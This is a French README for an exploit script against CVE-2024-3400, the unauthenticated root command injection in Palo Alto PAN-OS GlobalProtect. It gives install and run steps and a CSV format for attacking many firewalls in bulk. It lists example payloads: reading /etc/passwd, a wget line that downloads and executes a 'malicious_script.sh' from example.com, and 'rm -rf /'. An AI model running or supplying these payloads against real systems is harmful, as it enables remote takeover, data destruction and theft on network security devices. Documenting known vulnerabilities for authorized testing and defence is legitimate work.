
# Script d'exploitation pour CVE-2024-3400 Script d'exploitation pour CVE-2024-3400, une injection de commande dans PAN-OS GlobalProtect, permettant l'exécution de code à distance non authentifiée avec les privilèges root. Prend en charge l'exploitation de cibles uniques et multiples basée sur des fichiers CSV.
Ce script est conçu pour démontrer l'exploitation de vulnérabilités dans les pare-feu PAN-OS. Il envoie une charge utile spécialement conçue au point de terminaison API du pare-feu pour exécuter des commandes arbitraires. Cet exploit cible spécifiquement CVE-2024-3400, une vulnérabilité d'injection de commandes dans la fonctionnalité GlobalProtect du logiciel PAN-OS de Palo Alto Networks pour certaines versions de PAN-OS. Certaines configurations de fonctionnalités peuvent permettre à un attaquant non authentifié d'exécuter du code arbitraire avec les privilèges root sur le pare-feu.
Remarque: Assurez-vous de n'utiliser ce script qu'à des fins légales et éthiques, et uniquement sur des machines pour lesquelles vous avez l'autorisation de tester.
Pour utiliser ce projet, suivez ces étapes :
git clone https://github.com/Yuvvi01/CVE-2024-3400
cd CVE-2024-3400
pip install -r requirements.txt
python3 exploit.py
Suivez les invites pour saisir l'adresse IP du pare-feu PAN-OS vulnérable et la charge utile à exécuter.
ls -la
cat /etc/passwd
whoami
wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
rm -rf /
Le script demandera le chemin du fichier du certificat SSL du serveur de pare-feu PAN-OS. Si aucun chemin n'est fourni, le script définira automatiquement la vérification SSL sur false, désactivant ainsi SSL.
Ce script vous permet d'exploiter plusieurs cibles de pare-feu PAN-OS vulnérables à l'aide d'un fichier CSV. Vous trouverez ci-dessous les instructions pour formater correctement le fichier CSV :
Le fichier CSV doit comporter trois colonnes :
ipaddress: L'adresse IP du pare-feu PAN-OS vulnérable. payload: La charge utile à exécuter sur le pare-feu. path/to/root_CA_certificate.pem: Le chemin du certificat d'autorité de certification racine (laissez vide si la vérification du certificat est désactivée).
ipaddress,payload,path/to/root_CA_certificate.pem
192.168.1.1,exploit_payload1,/path/to/certificate.pem
192.168.1.2,exploit_payload2,
Créez un fichier CSV au format spécifié. Renseignez les adresses IP, les charges utiles et les chemins des certificats d'autorité de certification racine (le cas échéant). Assurez-vous de fournir des chemins valides vers les certificats d'autorité de certification racine, ou laissez le champ vide si la vérification du certificat est désactivée. Exécutez le script et choisissez l'option permettant d'utiliser le fichier CSV lorsque vous y êtes invité.